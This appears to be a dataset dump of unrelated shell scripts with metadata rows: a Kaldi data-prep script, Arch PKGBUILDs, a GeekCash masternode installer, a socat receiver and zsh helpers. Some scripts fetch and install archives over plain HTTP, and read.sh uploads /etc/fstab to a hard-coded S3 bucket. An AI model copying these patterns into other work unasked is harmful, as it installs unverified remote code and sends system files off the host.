tail -f "$LOGFIFO"
fi
| true
|
71449528d8ecd4459dffc53468689890d26ecb9d
|
Shell
|
samsucik/prosodic-lid-globalphone
|
/egs/reverb/s5/local/REVERB_create_mcdata.sh
|
UTF-8
| 2,572
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2013 MERL (author: Shinji Watanabe)
# Contains some code by Microsoft Corporation, Johns Hopkins University (author: Daniel Povey)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
if [ $# -ne 2 ]; then
printf "\nUSAGE: %s <wsjcam0 data dir> <dest dir>\n\n" `basename $0`
echo "e.g.,:"
echo " `basename $0` /archive/speech-db/processed/public/REVERB/wsjcam0 data_mc_tr"
exit 1;
fi
wsjcam0_dir=$1
reverb_tr_dir=$2
dir=`pwd`/data/local/reverb_tools
mkdir -p $dir $reverb_tr_dir
lmdir=`pwd`/data/local/nist_lm
# Download tools
URL1="http://reverb2014.dereverberation.com/tools/reverb_tools_for_Generate_mcTrainData.tgz"
URL2="http://reverb2014.dereverberation.com/tools/REVERB_TOOLS_FOR_ASR_ver2.0.tgz"
for f in $URL1 $URL2; do
x=`basename $f`
if [ ! -e $dir/$x ]; then
wget $f -O $dir/$x || exit 1;
tar zxvf $dir/$x -C $dir || exit 1;
fi
done
URL3="http://reverb2014.dereverberation.com/tools/taskFiles_et.tgz"
x=`basename $URL3`
if [ ! -e $dir/$x ]; then
wget $URL3 -O $dir/$x || exit 1;
tar zxvf $dir/$x -C $dir || exit 1;
cp -fr $dir/`basename $x .tgz`/* $dir/ReleasePackage/reverb_tools_for_asr_ver2.0/taskFiles/
fi
# Download and install nist tools
pushd $dir/ReleasePackage/reverb_tools_for_asr_ver2.0
perl -ape "s|^main$|targetSPHEREDir\=tools/SPHERE\ninstall_nist|;" installTools > installnist
chmod u+x installnist
./installnist
popd
# Make mcTrainData
cp local/Generate_mcTrainData_cut.m $dir/reverb_tools_for_Generate_mcTrainData/
pushd $dir/reverb_tools_for_Generate_mcTrainData/
# copied nist tools required for the following matlab command
cp $dir/ReleasePackage/reverb_tools_for_asr_ver2.0/tools/SPHERE/nist/bin/{h_strip,w_decode} ./bin/
tmpdir=`mktemp -d tempXXXXX `
tmpmfile=$tmpdir/run_mat.m
cat <<EOF > $tmpmfile
addpath(genpath('.'))
Generate_mcTrainData_cut('$wsjcam0_dir', '$reverb_tr_dir');
EOF
cat $tmpmfile | matlab -nodisplay
rm -rf $tmpdir
popd
echo "Successfully generated multi-condition training data and stored it in $reverb_tr_dir." && exit 0;
| true
|
db81cfa6b1a6674de1aeab3159bcf358eb566e3a
|
Shell
|
petronny/aur3-mirror
|
/finalterm-git/PKGBUILD
|
UTF-8
| 1,340
| 2.796875
| 3
|
[] |
no_license
|
# Maintainer : Valentin Hăloiu <vially.ichb+aur@gmail.com>
# Contributor : Martin Wimpress <code@flexion.org>
_pkgname=finalterm
pkgname=${_pkgname}-git
pkgver=191.39b078b
pkgrel=1
pkgdesc="A new breed of terminal emulator"
arch=('x86_64' 'i686')
url="http://finalterm.org"
license=('GPL3')
depends=('clutter-gtk' 'desktop-file-utils' 'libgee' 'libkeybinder3' 'libnotify' 'mx')
makedepends=('cmake' 'git' 'intltool' 'vala')
provides=('finalterm')
conflicts=('finalterm')
source=("${pkgname}::git+https://github.com/p-e-w/${_pkgname}.git" "PR409.patch::https://github.com/joshslark/finalterm/commit/04697ea8632feb691238000c856f89f60cc0a612.patch")
sha1sums=('SKIP' '5e31d04378497bab14be9dd463e010d893d7e5cd')
install=${pkgname}.install
pkgver() {
cd "${srcdir}/${pkgname}"
echo $(git rev-list --count master).$(git rev-parse --short master)
}
build() {
cd "${srcdir}/${pkgname}"
git apply --check ../PR409.patch && git apply ../PR409.patch
cmake -DCMAKE_INSTALL_PREFIX=/usr
make
}
package() {
cd "${srcdir}/${pkgname}"
make DESTDIR="${pkgdir}" install
mkdir -p "${pkgdir}/usr/share/${_pkgname}/bin"
mv "${pkgdir}/usr/bin/${_pkgname}" "${pkgdir}/usr/share/${_pkgname}/bin"
cat<<EOF > ${pkgdir}/usr/bin/${_pkgname}
#!/usr/bin/bash
CLUTTER_BACKEND=x11 /usr/share/${_pkgname}/bin/finalterm
EOF
chmod a+x ${pkgdir}/usr/bin/${_pkgname}
}
| true
|
b3dfb605f19b4504bdc394758e0543f2c520c213
|
Shell
|
Kilobyte22/pm-arch
|
/packages/plasma-camera-git/PKGBUILD
|
UTF-8
| 835
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Bhushan Shah <bhush94 at gmail dot com>
pkgname=plasma-camera-git
pkgver=r9.0a68cd2
pkgrel=1
pkgdesc="Simple camera application for mobile devices"
arch=('any')
url="https://community.kde.org/Plasma/Mobile"
license=('GPL3')
depends=('plasma-framework')
makedepends=('git' 'cmake')
provides=('plasma-camera')
source=('git://anongit.kde.org/plasma-camera.git')
md5sums=('SKIP')
_gitname="plasma-camera"
pkgver() {
cd plasma-camera
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
prepare() {
mkdir -p build
}
build() {
cd build
cmake ../plasma-camera \
-DCMAKE_INSTALL_PREFIX=/usr \
-DBUILD_TESTING=OFF \
-DLIB_INSTALL_DIR=lib \
-DKDE_INSTALL_USE_QT_SYS_PATHS=ON \
-DCMAKE_BUILD_TYPE=Release
make
}
package() {
cd build
make DESTDIR="$pkgdir/" install
}
| true
|
ee13a1f45181b80397aa8798255ee9a091ce318d
|
Shell
|
geparada/my_src
|
/Tools/sam2bai.sh
|
UTF-8
| 175
| 2.734375
| 3
|
[] |
no_license
|
for i in $(ls *.sam)
do
name=${i%.sam}
samtools view -Sb $name.sam -o $name.bam && samtools sort $name.bam $name.sort.bam $name.sort.bam.bai && rm $name.sam $name.bam
done
| true
|
aefa705ca80512bc95f97e15ae585ab37d0db9ea
|
Shell
|
devopstguru/boto3
|
/read.sh
|
UTF-8
| 242
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
input="/etc/fstab"
rm /fstabbackup
rm /fstab
while IFS= read -r line
do
echo "$line" >> /fstab
done < "$input"
cat /fstab | grep -A100 /backup >> /fstabbackup
aws s3 cp /fstabbackup s3://cf-templates-tqftrjy4ugkm-us-east-1
| true
|
8ccc4193c133bff78b5df5a5eba7b397bcaef947
|
Shell
|
KEINOS/Broadcast-inside-Docker-network
|
/receiver/python3/receiver.sh
|
UTF-8
| 431
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# =============================================================================
# This script receives the broadcast message via "socat" command and pipes the
# STDOUT output to the Python3 script.
# =============================================================================
socat -u UDP-LISTEN:$PORT_UDP_BROADCAST,fork STDOUT |
while read line; do
echo $line | /usr/local/bin/python /app/parrotry.py
done
| true
|
a0eb05cebc1e765dc857b33ecf6b229c6e6e1f2d
|
Shell
|
aston-r/fibonacci
|
/deploy-k8s.sh
|
UTF-8
| 1,884
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
# Fail on any '$? > 0'
set -o errexit
# Constants
DOCKER_HUB_ACCOUNT='yevhenlodovyi'
PROJECT_NAME='fibonacci'
# Functions
function usage() {
echo """
Usage: $0 [--publish|--deploy|]
Args:
--publish: Publish Docker image into registry
--deploy: Deploy k8s configuration
"""
exit 0
}
# Main part
opts="$(getopt -o '' -l 'publish,deploy,help' -- "$@")"
eval set -- "${opts}"
while true; do
case "${1}" in
'--publish') publish='Y'; shift 1;;
'--deploy') deploy='Y'; shift 1;;
'--help') usage;;
'--') shift; break ;;
*) break ;;
esac
done
# Get the latest commit id
git_sha="$(git rev-parse HEAD)"
# Build and ulpload images to docker registry
# NOTE: nginx is used only in docker-compose configuration, so skip it.
subdirs="$(find . -maxdepth 2 -name 'Dockerfile' -not -path './nginx/*' -printf '%p\n' \
| xargs -I {} dirname {} \
| xargs -I {} basename {})"
for subdir in ${subdirs}; do
tag_prefix="${DOCKER_HUB_ACCOUNT}/${PROJECT_NAME}-${subdir}"
echo "Building '${tag_prefix}' image to registry..."
docker build -t "${tag_prefix}:latest" \
-t "${tag_prefix}:${git_sha}" \
"${subdir}"
if [[ "${publish}" == 'Y' ]]; then
echo "Uploading '${tag_prefix}' to registry..."
docker push "${tag_prefix}:latest"
docker push "${tag_prefix}:${git_sha}"
fi
done
# Deploy k8s
if [[ "${deploy}" == 'Y' ]]; then
echo 'Deploying k8s configuration...'
kubectl apply -f k8s
# Force deployments to re-pull an image
# TODO:check if there is more convinient way:
# https://github.com/kubernetes/kubernetes/issues/33664
for subdir in ${subdirs}; do
kubectl set image "deployments/${subdir}-deployment" \
"${subdir}=${DOCKER_HUB_ACCOUNT}/${PROJECT_NAME}-${subdir}:${git_sha}"
done
fi
| true
|
76d87c69c2f95d287434d20f79161dfb7a49c23a
|
Shell
|
postarc/geekcash
|
/install.sh
|
UTF-8
| 7,047
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
# install.sh
# Installs masternode on Ubuntu 16.04 x64 & Ubuntu 18.04
# ATTENTION: The anti-ddos part will disable http, https and dns ports.
BINTAR='geekcash-1.3.0-x86_64-linux-gnu.tar.gz'
BINADDR='https://github.com/GeekCash/geek/releases/download/v1.3.0.1/geekcash-1.3.0-x86_64-linux-gnu.tar.gz'
BPATH='geekcash-1.3.0/bin'
RPCPORT=6888
PORT=6889
COIN_PORT=6889
TRYCOUNT=15
WAITP=3
if [[ "$USER" == "root" ]]; then
HOMEFOLDER="/root"
else
HOMEFOLDER="/home/$USER"
fi
sudo apt-get install -y curl >/dev/null 2>&1
sudo apt-get install -y lsof >/dev/null 2>&1
#while [ -n "$(sudo lsof -i -s TCP:LISTEN -P -n | grep $RPCPORT)" ]
#do
#(( RPCPORT--))
#done
echo -e "\e[32mFree RPCPORT address:$RPCPORT\e[0m"
#while [ -n "$(sudo lsof -i -s TCP:LISTEN -P -n | grep $PORT)" ]
#do
#(( PORT++))
#done
echo -e "\e[32mFree MN port address:$PORT\e[0m"
if [[ $EUID -eq 0 ]] && [ "$USER" != "root" ]; then
echo -e "${RED}$0 must be run whithout sudo.${NC}"
exit 1
fi
cd
if [ -d .geekcash ]; then
printf "~/.geekcash/ already exists! The installer will delete this folder. Continue anyway?(Y/n):"
read REPLY
if [ "$REPLY" == "y" ] || [ "$REPLY" == "" ] || [ "$REPLY" == "Y" ]; then
pID=$(ps -u $USER -e | grep geekcashd | awk '{print $1}')
if [ $pID ]; then sudo kill ${pID} && sleep 5; fi
rm -rf ~/.geekcash
fi
fi
mkdir .geekcash
# The RPC node will only accept connections from your localhost
_rpcUserName=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 12 ; echo '')
# Choose a random and secure password for the RPC
_rpcPassword=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32 ; echo '')
# Get the IP address of your vps which will be hosting the masternode
_nodeIpAddress=`curl ifconfig.me/ip`
#_nodeIpAddress=$(curl -s 4.icanhazip.com)
if [[ ${_nodeIpAddress} =~ ^[0-9]+.[0-9]+.[0-9]+.[0-9]+$ ]]; then
external_ip_line="externalip=${_nodeIpAddress}:$COIN_PORT"
else
external_ip_line="#externalip=external_IP_goes_here:$COIN_PORT"
fi
# Make a new directory for geekcash daemon
#mkdir ~/.geekcash/
#touch ~/.geekcash/geekcash.conf
# Download geekcash and put executable to /usr/bin
echo -e "\e[32mChecking bin files...\e[0m"
#wget -qO- --no-check-certificate --content-disposition
if [ -f "/usr/local/bin/geekcashd" ]; then
rm /usr/local/bin/geekcashd
rm /usr/local/bin/geekcash-cli
fi
if [ -f "/usr/bin/geekcashd" ]; then
echo "Bin files exist, skipping copy."
else
echo -e "\e[32mGeekCash downloading...\e[0m"
echo "get and unzip..."
mkdir temp
cd temp
wget $BINADDR
tar -xzvf $BINTAR
#curl -LJO $BINADDR
#tar -xzvf $BINTAR
echo -e "\e[32mPut executable to /usr/bin\e[0m"
sudo bash -c "cp ./$BPATH/geekcashd /usr/bin/"
sudo bash -c "cp ./$BPATH/geekcash-cli /usr/bin/"
sudo chmod +x /usr/bin/geekcash*
cd ..
rm -rf temp
fi
# Change the directory to ~/.geekcash
cd ~/.geekcash/
echo -e "\e[32mCreate the initial geekcash.conf file...\e[0m"
# Create the initial geekcash.conf file
echo -e "rpcuser=${_rpcUserName}
rpcpassword=${_rpcPassword}
rpcallowip=127.0.0.1
rpcport=$RPCPORT
listen=1
server=1
daemon=1
logtimestamps=1
maxconnections=64
txindex=1
${external_ip_line}
port=$PORT
" > geekcash.conf
# Get a new privatekey by going to console >> debug and typing masternode genkey
printf "Enter Masternode PrivateKey: "
read _nodePrivateKey
if [[ -z "$_nodePrivateKey" ]]; then
geekcashd -daemon
sleep 3
if [ -z "$(ps axo cmd:100 | grep geekcashd)" ]; then
echo -e "${GREEN}$COIN_NAME server couldn not start."
exit 1
fi
ERROR=1
if [[ "$ERROR" -gt "0" ]]; then echo -n "Daemon initialized, please wait ..."; fi
while [ "$ERROR" -gt "0" ] && [ "$TRYCOUNT" -gt "0" ]
do
sleep $WAITP
_nodePrivateKey=$(geekcash-cli masternode genkey) >/dev/null 2>&1
ERROR=$?
if [ "$ERROR" -gt "0" ]; then
echo -n "."
fi
TRYCOUNT=$[TRYCOUNT-1]
done
geekcash-cli stop
fi
if [[ -z "$_nodePrivateKey" ]]; then
echo "Masternode key could not be generated. Edit the config file manually."
fi
# Write masternode privat key to geekcash.conf file
echo -e "
masternode=1
masternodeprivkey=${_nodePrivateKey}
" >> geekcash.conf
cd
# Create a directory for masternode's cronjobs and the anti-ddos script
mkdir -p masternode/geekcash
# Download the appropriate scripts
echo -e "\e[32mCopy scripts...\e[0m"
cp geekcash/makerun.sh masternode/geekcash
cp geekcash/checkdaemon.sh masternode/geekcash
cp geekcash/clearlog.sh masternode/geekcash
#Sentinel installing
echo -e "\e[32mSentinel installing...\e[0m"
sudo apt-get update
#>/dev/null 2>&1
sudo apt-get -y install python
#>/dev/null 2>&1
sudo apt-get -y install python-virtualenv
sudo apt-get -y install python3-virtualenv
#>/dev/null 2>&1
cd ~ && cd .geekcash
git clone https://github.com/geekcash/sentinel.git && cd sentinel
virtualenv ./venv
./venv/bin/pip install -r requirements.txt
# Create sentinel.conf file
echo -e "
# specify path to geekcash.conf or leave blank
# default is the same as GeekCash
geekcash_conf=$HOMEFOLDER/.geekcash/geekcash.conf
# valid options are mainnet, testnet (default=mainnet)
network=mainnet
#network=testnet
# database connection details
db_name=database/sentinel.db
db_driver=sqlite
" > sentinel.conf
# Create a cronjob for making sure geekcashd runs after reboot
echo -e "\e[32mCreate a cronjob for making sure geekcashd runs after reboot\e[0m"
if ! crontab -l | grep "@reboot /usr/bin/geekcashd"; then
(crontab -l ; echo "@reboot /usr/bin/geekcashd") | crontab -
fi
# Create a cronjob for making sure geekcashd is always running
if ! crontab -l | grep "masternode/geekcash/makerun.sh"; then
(crontab -l ; echo "*/5 * * * * ~/masternode/geekcash/makerun.sh") | crontab -
fi
# Create a cronjob for making sure the daemon is never stuck
if ! crontab -l | grep "masternode/geekcash/checkdaemon.sh"; then
(crontab -l ; echo "*/30 * * * * $HOMEFOLDER/masternode/geekcash/checkdaemon.sh") | crontab -
fi
# Create a cronjob for clearing the log file
if ! crontab -l | grep "masternode/geekcash/clearlog.sh"; then
(crontab -l ; echo "0 0 */2 * * $HOMEFOLDER/masternode/geekcash/clearlog.sh") | crontab -
fi
# Create a cronjob for sentinel
if ! crontab -l | grep ".geekcash/sentinel"; then
(crontab -l ; echo -e "* * * * * cd $HOMEFOLDER/.geekcash/sentinel && ./venv/bin/python bin/sentinel.py >/dev/null 2>&1") | crontab -
fi
# Change the directory to ~/masternode/
cd $HOMEFOLDER/masternode/geekcash
# Give execute permission to the cron scripts
chmod 0700 ./makerun.sh
chmod 0700 ./checkdaemon.sh
chmod 0700 ./clearlog.sh
# Firewall security measures
echo "Install firewall & adding firewalls rules..."
sudo apt install ufw -y >/dev/null 2>&1
sudo ufw allow $PORT/tcp >/dev/null 2>&1
sudo ufw allow $RPCPORT/tcp >/dev/null 2>&1
sudo ufw allow ssh >/dev/null 2>&1
sudo ufw logging on >/dev/null 2>&1
sudo ufw default allow outgoing >/dev/null 2>&1
sudo ufw --force enable
# Start GeekCash Deamon
geekcashd
cd
rm -rf geekcash
# Reboot the server
#reboot
| true
|
1375de53112b22f74dcd0f8bd6048dc912e829f8
|
Shell
|
cnewcome/scripts
|
/listcol.joe
|
UTF-8
| 2,626
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Passing a $1 argument will list all collectors that have a string that matches that argument.
# Passing no argument will use your current working directory and strip out the machinesig
# and use that to list all matching collectors with same machinesig.
# CRN - 2016-03-10 -- rewrote the search potion to work faster. It now displays the newest collector first.
# BAH - 2016-06-24 -- added -n= limit to allow it to return faster for scripting purposes.
# CRN - 2016-07-01 -- added -g to automatically take you to the newest collector found with -c or pwd.
# CRN - 2016-07-06 -- added -d to only check a single date.
COUNT=0;MAX_C=10
CFLAG=0;FFLAG=0;DFLAG=0
if test $# -gt 0; then
for flag in "$@"; do
case $flag in
-c=*)
CFLAG=1
CSEARCH="${flag#*=}"
shift
;;
-d=*)
DFLAG=1
DATE_SEARCH="${flag#*=}"
shift
;;
-f=*)
FFLAG=1
FIND="${flag#*=}"
shift
;;
-n=*)
MAX_C="${flag#*=}"
shift
;;
-g)
GO=1
MAX_C=1
;;
*)
echo "Invalid argument: ${flag#*}"
echo " -c= String in collector filename to search for"
echo " -f= Filename to find within the collector"
echo " -g= Automatically go to the newest collector matching -c"
echo " -n= Output this many ingested paths maximum; default 10"
exit
;;
esac
done
fi
if [[ $CFLAG -eq 0 ]]; then
CSEARCH=$(pwd | awk -F/ '{print $6}' | awk -F- '{print $4}')
fi
if [[ $FFLAG -eq 1 ]]; then
for loop in $(ls -d ~/ingested/2*/*$CSEARCH*); do
find $loop -name "*${FIND}*" -exec ls -la {} \;
done
else
if [[ ! -z $CSEARCH ]]; then
if [[ $DFLAG -eq 0 ]]; then
for loop in $(echo ~/ingested/20* | sed 's/ /\n/g' | sort -n -r); do
CL=$(echo $loop/*$CSEARCH* | sed 's/ /\n/g' | sort -n -r 2> /dev/null)
if [[ "$CL" != "$loop/*$CSEARCH*" ]]; then
for COL in $(echo $CL); do
if [[ $GO -eq 1 ]]; then
cpwd "$COL"
else
echo $COL
fi
COUNT=$(($COUNT + 1))
if [[ "$COUNT" -ge "$MAX_C" ]]; then
exit;
fi
done
fi
done
else
ls -d ~/ingested/${DATE_SEARCH}/*$CSEARCH* 2> /dev/null
fi
fi
fi
| true
|
9cf71765e4bf0b9aedf56b11cd6d80e09ad5921d
|
Shell
|
HexHive/FuZZan
|
/LLVM/scripts/install-msan-files.sh
|
UTF-8
| 850
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#This script softlinks our modified files into the LLVM source tree
#Path to llvm source tree
llvm=`pwd`/llvm
src=`pwd`/src
runtime=`pwd`/compiler-rt
rm $runtime/lib/msan/msan_allocator.cc
rm $runtime/lib/msan/msan.h
rm $runtime/lib/msan/msan_linux.cc
rm $runtime/lib/msan/CMakeLists.txt
rm $runtime/lib/msan/msan_interceptors.cc
rm $runtime/lib/msan/msan_origin.h
ln -s $src/compiler-rt-files/msan_interceptors.cc $runtime/lib/msan/msan_interceptors.cc
ln -s $src/compiler-rt-files/msan_allocator.cc $runtime/lib/msan/msan_allocator.cc
ln -s $src/compiler-rt-files/msan.h $runtime/lib/msan/msan.h
ln -s $src/compiler-rt-files/msan_linux.cc $runtime/lib/msan/msan_linux.cc
ln -s $src/compiler-rt-files/msan_origin.h $runtime/lib/msan/msan_origin.h
ln -s $src/compiler-rt-files/lib_msan_cmakelists.txt $runtime/lib/msan/CMakeLists.txt
| true
|
05ac109ad210873ca74a5065053fd66cd2462b30
|
Shell
|
BME-DDB/SparkServer
|
/shell/build.sh
|
UTF-8
| 679
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# /***
# * 编译、清理脚本
# * @author manistein
# * @since 2019-04-19
# */
parentPath=$(dirname $(pwd))
function build() {
# 编译spark-server
echo "====================="
echo "start build spark-server"
cd $parentPath/spark-server
MONO_IOMAP=case msbuild SparkServer.sln
cd $parentPath/spark-server/server/bin/Debug
chmod 755 *
}
function clean() {
# 清理spark-server
echo "====================="
echo "start clean spark-server"
cd $parentPath/spark-server/server/bin
rm -rf *
}
if [[ "$1" == "all" ]]; then
build
elif [[ "$1" == "clean" ]]; then
clean
elif [[ "$1" == "rebuild" ]]; then
clean
build
else
echo "不存在$1指令"
fi
| true
|
11d46bdcd45af291c00e9b4dcb915af0f3dd6616
|
Shell
|
a-mail-group/coherent
|
/src/sys.r12/conf/cohmain/src/mkdev.sh
|
UTF-8
| 1,180
| 3.390625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# cohamin/mkdev - get general system configuration
# Revised: Wed Mar 2 18:10:11 1994 CST
DEVDIR=/dev
. /usr/lib/shell_lib.sh
COMMAND_NAME=$0
source_path $0 "HOME_DIR="
parent_of $HOME_DIR "CONF_DIR="
. $CONF_DIR/bin/conf_lib.sh
# Things to do:
#
# Check on CYRIX configuration.
CXHW=$($CONF_DIR/bin/cxtype)
case $CXHW in
Cx486*)
# Cyrix upgrade part. Enable cache?
while : ; do
get_tunable CYRIX_CACHE_SPEC cxc
if [ $cxc -eq 0 ];then
cxcyn=n
elif [ $cxc -eq 1 ];then
cxcyn=y
else
cxcyn=???
fi
read_input "\nEnable Cyrix 486 internal cache" \
new_cxcyn $cxcyn require_yes_or_no
# Convert yes or no to, specifically, "y" or "n".
if is_yes $new_cxcyn; then
new_cxcyn=y
else
new_cxcyn=n
fi
is_equal $cxcyn $new_cxcyn || {
if is_equal $new_cxcyn n; then
echo "Cache will be disabled."
cxc=0
else
echo "Cache will be enabled."
cxc=1
fi
}
$CONF_DIR/bin/idtune -f CYRIX_CACHE_SPEC $cxc
read_input "Is Cyrix cache setting correct" ANS "y" \
require_yes_or_no
is_yes $ANS && break
done
;;
*)
# Not a Cyrix upgrade part. Nothing to do.
;;
esac
exit 0
| true
|
08ed68d258ebe2403b2ce278bb6a027eb4f93aff
|
Shell
|
mad-max-traveller/viz_scripts
|
/Seed node/1_zero_build_viz.sh
|
UTF-8
| 3,460
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
. config.sh
apt-get update && apt-get install -y build-essential autoconf automake cmake g++ git libssl-dev libtool make pkg-config python3 python3-jinja2 libboost-chrono-dev libboost-context-dev libboost-coroutine-dev libboost-date-time-dev libboost-filesystem-dev libboost-iostreams-dev libboost-locale-dev libboost-program-options-dev libboost-serialization-dev libboost-signals-dev libboost-system-dev libboost-test-dev libboost-thread-dev doxygen libncurses5-dev libreadline-dev perl
fallocate -l 10G $WORKDIR_SWAP/swapfile
ls -lh $WORKDIR_SWAP/swapfile
chmod 600 $WORKDIR_SWAP/swapfile
mkswap $WORKDIR_SWAP/swapfile
swapon $WORKDIR_SWAP/swapfile
swapon --show
mount -o remount,size=10G /dev/shm
mount -l | grep "/dev/shm"
free -h
echo '$WORKDIR_SWAP/swapfile none swap sw 0 0' | tee -a /etc/fstab
cat /etc/fstab
sysctl vm.swappiness=80
sysctl vm.vfs_cache_pressure=50
echo "vm.swappiness=80" >> /etc/sysctl.conf
echo "vm.vfs_cache_pressure=50" >> /etc/sysctl.conf
tail /etc/sysctl.conf
# Настройка часового пояса, производится вводом цифры региона и местоположения.
# Перезапустить настройку можно командой sudo dpkg-reconfigure tzdata.
apt-get install -y screen tzdata
cd $WORKDIR
git clone https://github.com/VIZ-World/viz-world.git
cd $WORKDIR/viz-world
#git checkout master
git checkout mainnet-dev
#git checkout mainnet-test2
git submodule update --init --recursive -f
mkdir $WORKDIR/viz-world/build
cd $WORKDIR/viz-world/build
cmake -DCMAKE_BUILD_TYPE=Release ..
cd $WORKDIR/viz-world/build/ && nohup make -j$(nproc) vizd > buildlog_vizd.txt
cd $WORKDIR/viz-world/build/ && nohup make -j$(nproc) cli_wallet > buildlog_cli_wallet.txt
# cd $WORKDIR/viz-world/build/programs/vizd/ && rm -f screenlog.0 && screen -dmLS vizd $WORKDIR/viz-world/build/programs/vizd/vizd --resync
# sleep 5s
# screen -S vizd -p 0 -X quit
# Копируем снапшот в каталог к исполняемому файлу
mkdir $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir
cp $WORKDIR/viz-world/share/vizd/snapshot.json $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir
# Заполняем параметрами конфиг ноды.
cat <<EOT > $WORKDIR/viz-world/build/programs/vizd/witness_node_data_dir/config.ini
shared-file-dir = "blockchain"
shared-file-size = 2G
inc-shared-file-size = 2G
min-free-shared-file-size = 500M
block-num-check-free-size = 1000
single-write-thread = 0
clear-votes-before-block = 0
skip-virtual-ops = 0
enable-plugins-on-push-transaction = 0
follow-max-feed-size = 500
webserver-thread-pool-size = 256
# minimal plugins
plugin = chain p2p json_rpc webserver network_broadcast_api
p2p-seed-node = 172.104.132.57:9099
p2p-seed-node = 94.16.120.147:4248
p2p-seed-node = 142.93.228.7:2001
p2p-seed-node = 178.62.61.190:8099
p2p-seed-node = 13.81.61.249:2001
p2p-seed-node = 54.93.168.9:2001
p2p-endpoint = 0.0.0.0:8082
enable-stale-production = true
required-participation = 0
[log.console_appender.stderr]
stream = std_error
[log.file_appender.p2p]
filename = logs/p2p/p2p.log
[logger.default]
level = all
appenders = stderr
[logger.p2p]
level = all
appenders = p2p
EOT
# Запускаем ноду в сесии screen
#
#cd $WORKDIR/viz-world/build/programs/vizd/ && rm -f screenlog.0 && screen -dmLS vizd $WORKDIR/viz-world/build/programs/vizd/vizd --resync
exit 0
| true
|
bf04e908a2ab309949b13812be18c6687564ef8f
|
Shell
|
bspan2001/docker-images
|
/ruby/build.sh
|
UTF-8
| 1,284
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash -ex
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
IMAGE_NAME=szewec/${DIR##*/}
CACHE_DIR=${CACHE_DIR:-${DIR}/.cache}
source $DIR/../lib.sh
if [[ "$PULL_IMAGES" = "true" ]]; then
# pull all tags of the docker image
docker pull "${IMAGE_NAME}:2.2" || true
docker pull "${IMAGE_NAME}:2.3" || true
docker pull "${IMAGE_NAME}:2.4" || true
docker pull "${IMAGE_NAME}:latest" || true
fi
if [[ "$PULL_IMAGES_ONLY" != "true" ]]; then
# build docker image with multiple tags
docker build -t "${IMAGE_NAME}:2.2" --force-rm "${DIR}/2.2"
docker build -t "${IMAGE_NAME}:2.3" --force-rm "${DIR}/2.3"
docker build -t "${IMAGE_NAME}:2.4" -t "${IMAGE_NAME}:latest" --force-rm "${DIR}/2.4"
if [[ "$ENABLE_CACHE" = "true" ]]; then
# save docker image to cache dir
mkdir -p ${CACHE_DIR}/szewec
docker save -o "${CACHE_DIR}/${IMAGE_NAME}-2.2.tar" "${IMAGE_NAME}:2.2"
docker save -o "${CACHE_DIR}/${IMAGE_NAME}-2.3.tar" "${IMAGE_NAME}:2.3"
docker save -o "${CACHE_DIR}/${IMAGE_NAME}-2.4.tar" "${IMAGE_NAME}:2.4"
fi
fi
if [[ "$PUSH_IMAGES" = "true" ]]; then
# push all tags of the docker image
docker push "${IMAGE_NAME}:2.2"
docker push "${IMAGE_NAME}:2.3"
docker push "${IMAGE_NAME}:2.4"
docker push "${IMAGE_NAME}:latest"
fi
| true
|
588ef38c2e30be5ca4ff4af8740256519ddccf67
|
Shell
|
manicminer/dotfiles
|
/functions
|
UTF-8
| 7,273
| 4.0625
| 4
|
[
"Apache-2.0"
] |
permissive
|
# These only work with zsh
find_up() {
if [[ -n "${2}" ]]; then
_path="${2}"
else
_path="${PWD}"
fi
while [[ "${_path}" != "" && ! -e "${_path}/${1}" ]]; do
_path="${_path%/*}"
done
if [[ -n "${_path}" ]]; then
echo "${_path}/${1}"
return 0
fi
return 1
}
find_up_all() {
if [[ -n "${2}" ]]; then
_path="${2}"
else
_path="${PWD}"
fi
_result=()
while [[ "${_path}" != "" ]]; do
[[ -e "${_path}/${1}" ]] && _result+=("${_path}/${1}")
_path="${_path%/*}"
done
if [[ $#_result > 0 ]]; then
printf "%s\n" "${(Oa)_result[@]}"
return 0
fi
return 1
}
# portable way to generate md5 checksums
_md5() {
if which md5sum 1>/dev/null 2>/dev/null; then
md5sum $@
elif which md5 1>/dev/null 2>/dev/null; then
echo "$(md5 $@ | grep -o "[a-f0-9]\{32\}") ${@:-1}"
else
echo "no md5 checksum tool found" >&2
return 127
fi
}
# use gnu tools on macos where available
gnu_exec() {
tool="${1}"
shift
case "${PLATFORM}" in
MacOS)
if whence -p "g${tool}" 1>/dev/null 2>/dev/null; then
command "g${tool}" $*
else
echo "command not found: g${tool}" >&2
return 127
fi
;;
*)
if whence -p "g${tool}" 1>/dev/null 2>/dev/null; then
command "g${tool}" $*
else
"${tool}" $*
fi
;;
esac
}
gsed() {
gnu_exec sed $*
}
greadlink() {
gnu_exec readlink $*
}
# set tmux window title
wt() {
if [ -z "${@}" ]; then
tmux set-window-option automatic-rename "on" 1>/dev/null
else
tmux rename-window "${@}"
fi
}
